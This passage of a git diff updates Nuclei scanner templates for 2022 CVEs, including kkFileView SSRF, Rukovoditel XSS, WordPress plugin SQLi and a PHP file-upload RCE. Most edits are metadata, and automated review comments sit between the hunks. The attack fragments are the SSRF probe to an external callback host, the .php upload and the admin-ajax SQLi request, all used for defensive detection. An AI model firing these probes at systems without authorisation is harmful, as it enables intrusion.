app="kkfileview" - - body="kkfileview" + shodan-query: http.html:"kkFileView" + fofa-query: app="kkFileView" tags: cve2022,cve,ssrf,kkFileview,keking http: - method: GET path: - - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://{{interactsh-url}}')}}" + - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}" matchers: - type: word part: body words: - "

Interactsh Server

" -# digest: 4a0a00473045022017ef3e771c51d1d4f3306aa79fcccc291b263d020cbdd4b9b884010b9bf775f3022100af0e67bc1486df800715864fb143e17beab07d61c93127daacd3991c5a1cc9a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b810cd7135af4ac4280bcbb9a33af48834cfab8a8a104301dc1233773a645af5022100df9ffc099f882bc743890dc78cc2de64f4a92da50a2bd3d1bc9193d1dedd1f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43164.yaml b/nuclei-templates/CVE-2022/CVE-2022-43164.yaml index 2edb3f3372..0ee7cc148d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43164.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43164 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.003 + epss-percentile: 0.66367 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" 
@@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a004730450221008fd371ee45f32c482b25f58da816e6f4abb8981e2f2956787721c4b34a4175680220678586f005c089ccfbfac1a643ead73bb3985512909398074205fbbfa670c24d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43165.yaml b/nuclei-templates/CVE-2022/CVE-2022-43165.yaml index f195d869fe..2d5f2093c6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43165.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true 
@@ -64,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a0048304602210086d2b1f1859fb325e2295eba49b7d68be6c60dc5ee22c2bc998a93201ccd0912022100f6dd41b70ace548f74cb157363587d5ce15fa0bc949cb5e33ff30110a6506954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43166.yaml b/nuclei-templates/CVE-2022/CVE-2022-43166.yaml index 82a72f0ad2..13fd099436 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43166.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43166.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true 
@@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100d12f0e561d82f3a1df64d74745f2e6badb0f2bc278c3c95e24886a6632cf159a022100ad7270b453d47be45a764d3fac3d3f6132edc7030a2ef9ee7b93093dd1841a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43167.yaml b/nuclei-templates/CVE-2022/CVE-2022-43167.yaml index 3fc8f26daf..87d4b73096 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43167.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43167.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43167 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.00197 + epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" 
@@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100b7c066e095870584ad20155d65ee2a43c319f761050a076fcb8248db27eb7f560220484316387fa51b7e2c287896988d65249bdbf65420fea5e430f99bdf39b16010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43169.yaml b/nuclei-templates/CVE-2022/CVE-2022-43169.yaml index c4d24c61ba..afbf5927fe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43169.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52097 + epss-score: 0.003 + epss-percentile: 0.66367 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true 
@@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bde82e2dd228e20185bf6fcef905f4964e7472766f4864c05b24a19b1aac2a08022074f35fb15d754d70e1f36a39de4fc5b514199e2f1f6e1c2e0c6711ccddfbe13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43170.yaml b/nuclei-templates/CVE-2022/CVE-2022-43170.yaml index c4efa6c3d7..9944fac2f6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43170.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43170.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.16411 - epss-percentile: 0.95468 + epss-score: 0.26563 + epss-percentile: 0.96323 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true 
@@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022005f1af9dc3b38edda441d678488aa6470220fb09eae3db729c2ce5ed35b7502f022100b2dd41a53a9dc73eb66b5e4efca0717d348b8c5378cfdf6d44c639f5bfdb438e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43185.yaml b/nuclei-templates/CVE-2022/CVE-2022-43185.yaml index b54ba825a1..ca6731f209 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43185.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43185.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43185 cwe-id: CWE-79 - epss-score: 0.34373 - epss-percentile: 0.96682 + epss-score: 0.45754 + epss-percentile: 0.97082 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100b27d125f405b692ffbd2baa49bf4da10d90267cb464f73ce5f53159bc18a332102205e8f62906a36299acb494b3f52a82b58d6dec6b427edd0bc947bc66fc734ae4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4320.yaml b/nuclei-templates/CVE-2022/CVE-2022-4320.yaml index 9b91ffc76b..5686e82340 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4320.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4320.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4320 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.34683 + epss-score: 0.00092 + epss-percentile: 0.3872 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: mhsoftware product: wordpress_events_calendar_plugin framework: wordpress - tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan + tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware http: - method: GET @@ -53,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6b7323b7052c23d91d0d26a227f3ad02500d0fccc27b6e0d079b6fb33a43bdb022100a281d4a730045eca39a056b6eba00e2b10571f044afef207d1b6d2f102257629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220754824a39c96f4cf434e9eb86e0a47441d3e9724d05ac3bd63ca2c7d54c20270022100d913f8ee7c703312dd076bb9fa9fac645bd47d3e8ab78d97ee9e0fa071909843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-4321.yaml b/nuclei-templates/CVE-2022/CVE-2022-4321.yaml index 5d1060919a..4ee1172954 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4321.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4321.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website. remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 - https://nvd.nist.gov/vuln/detail/CVE-2022-4321 - https://wordpress.org/plugins/pdf-generator-for-wp/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/kwalsh-rz/github-action-ecr-scan-test classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4321 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32646 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: product: pdf_generator_for_wordpress framework: wordpress publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" - tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp + tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: - method: GET 
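Review bot: The reference `https://github.com/kwalsh-rz/github-action-ecr-scan-test` added to the `reference:` list does not look like an advisory or analysis of CVE-2022-4321 — by its name it is a scanner test repository that presumably only mentions the CVE — and `ARPSyndicate/cvemon` is an aggregator; neither helps an operator triage a finding, and unrelated links in a template erode trust in the ones that matter. Keep the wpscan, NVD and plugin-page links and drop the two added ones, or if project policy is to retain aggregator hits, place them below the primary sources. The `remediation: Fixed in version 1.1.2` line is the actionable item and is unchanged here.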
@@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c616630fce360c35973f0d8143abf10f0ff9e96aa40d9d1fb78fd54f3c788bc8022032cdabefdc12a744db45747128ae8e5fd985999f0b6de3145efc8aa0f01397e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4325.yaml b/nuclei-templates/CVE-2022/CVE-2022-4325.yaml index 188321a7eb..886fb93b0c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4325.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4325.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.10.1. reference: - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395 @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4325 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +27,7 @@ info: vendor: ifeelweb product: post_status_notifier_lite framework: wordpress - tags: wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite + tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Post Status Notifier Lite")' condition: and -# digest: 4a0a0047304502202289158039225f6a91d723ebe3f2606c09e335a5463ecd357fd4afdb0c99aebb022100fabfa1873a8493836dd2c0f1564c582e44415da1d98a0470656a8d4eafee4e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205206499c7d6a2bedfe29a673b7c4c487f6357884ab5336b30c33d3f7116b4bfd02202e13bd6b2db15b9f638ba8688c91867f9730b8e4efa5df27dbf609ff6a0196f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4328.yaml b/nuclei-templates/CVE-2022/CVE-2022-4328.yaml index e92034dfe4..4d2163544c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4328.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4328.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4328 cwe-id: CWE-434 - epss-score: 0.45141 - epss-percentile: 0.97044 + epss-score: 0.22681 + epss-percentile: 0.96077 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,10 @@ info: vendor: najeebmedia product: woocommerce_checkout_field_manager framework: wordpress - tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive + tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload + +variables: + string: "CVE-2022-4328" http: - raw: @@ -38,7 +41,7 @@ http: Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream - + --------------------------22728be7b3104597-- - | 
@@ -48,16 +51,7 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - fe5df26ce4ca0056ffae8854469c282f - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022100d4dc1e0840817fa309cbe05b8e408819a44b0d3e083341e8c6e10398850d712702203c2004ec1a5ffc72ebb64f95b1542f9061860e9fc0a43202ed1dd50009ac72c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '{{md5(string)}}' +# digest: 4b0a00483046022100db4a0f639753de0386e0d6f256fdf6e31797f887c3f67051f67f03ff12021437022100e2072c64127d9242a4900aa37c32949d284a94fa2f241e66d10828e56cf2acbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43769.yaml b/nuclei-templates/CVE-2022/CVE-2022-43769.yaml index 68d2df540d..b51fa0f7e1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43769.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43769.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- 
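Review bot: The rewritten `body_2` matcher now hinges on `'{{md5(string)}}'` (with `string: "CVE-2022-4328"`) being exactly the token the uploaded `{{randstr}}.php` echoes back, but the payload line that produces it (the changed line in the `@@ -38,7 +41,7` hunk above) is not legible in this view, so the two sides cannot be cross-checked here; confirm the uploaded body hashes the same literal, otherwise the template silently never matches. Dropping the `text/html` header and `200` status matchers means any second response that carries the 32-hex token is accepted, which is acceptable for a unique token but deserves a comment, e.g. `# body_2: response to the request that fetches the uploaded file`. The `http:` raw requests this matcher refers to start outside this hunk.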
@@ -16,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.27382 - epss-percentile: 0.96307 + epss-score: 0.33038 + epss-percentile: 0.96634 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 - tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi http: - method: GET @@ -48,4 +50,4 @@ http: part: header words: - "application/json" -# digest: 490a00463044022050f4dc233a6c8c50bcadbcf396489d5989f5cf62ffd6cb402dbc43cfe69e6f6402200b14ceb503bd1bf9031de7df04c8feda19c878b89191432d6fd0ba9f90583f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44290.yaml b/nuclei-templates/CVE-2022/CVE-2022-44290.yaml index aaab774bf7..6a3a117619 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44290.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44290.yaml @@ -16,15 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.00789 - epss-percentile: 0.79529 + epss-score: 0.01336 + epss-percentile: 0.8578 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive + tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: 
@@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4b0a004830460221009a936b29b84c66953591a5aeff19006ed42e51409605e98b631fcb710ea77c6502210086295628272840aadfda1955e25e6e1e28cdbc5e72872b5a9c0b01bf5533acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44291.yaml b/nuclei-templates/CVE-2022/CVE-2022-44291.yaml index b40da98167..945f09a011 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44291.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44291.yaml @@ -16,15 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44291 cwe-id: CWE-89 - epss-score: 0.00789 - epss-percentile: 0.79529 + epss-score: 0.01336 + epss-percentile: 0.8578 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive + tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: @@ -64,4 +64,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and -# digest: 4a0a00473045022100d31144d74bde72fdc9a29212e98676d5fa0a21df115a3fff46e2c4f940faffc3022062e641f9840b58e0d7e5a0a382b7c3253402a57f8b5a5b63e7e8120e8d04545c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4447.yaml b/nuclei-templates/CVE-2022/CVE-2022-4447.yaml index ee37e0fedf..f56af58d56 100644 
--- a/nuclei-templates/CVE-2022/CVE-2022-4447.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4447.yaml @@ -1,11 +1,15 @@ id: CVE-2022-4447 info: - name: Fontsy <= 1.8.6 - Unauthenticated SQLi + name: WordPress Fontsy <=1.8.6 - SQL Injection author: theamanrawat severity: critical description: | - The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. + remediation: | + Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad - https://wordpress.org/plugins/fontsy/ @@ -15,14 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 + epss-score: 0.03134 + epss-percentile: 0.9009 + cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,wordpress,wp,wpscan,cve2022,wp-plugin,sqli,fontsy,unauth - + verified: true + max-request: 1 + vendor: fontsy_project + product: fontsy + framework: wordpress + tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project variables: num: "999999999" -requests: +http: - raw: - | POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1 
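Review bot: The rewritten `description:` in the `@@ -1,11 +1,15` hunk drops the qualifier that the AJAX action is reachable without authentication, which the old text stated and which the retained `unauth` tag, the `PR:N` vector behind `cvss-score: 9.8`, and the old title's "Unauthenticated" all depend on; suggest keeping `... via an AJAX action available to unauthenticated users.` in the new wording. The added `remediation:` is consistent with the title (`<=1.8.6` affected, `>=1.8.7` fixed), but its trailing "or apply the vendor-provided patch" is not supported by any entry in the reference list and can be dropped. The `http:` raw request that starts at the end of the second hunk continues outside it.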
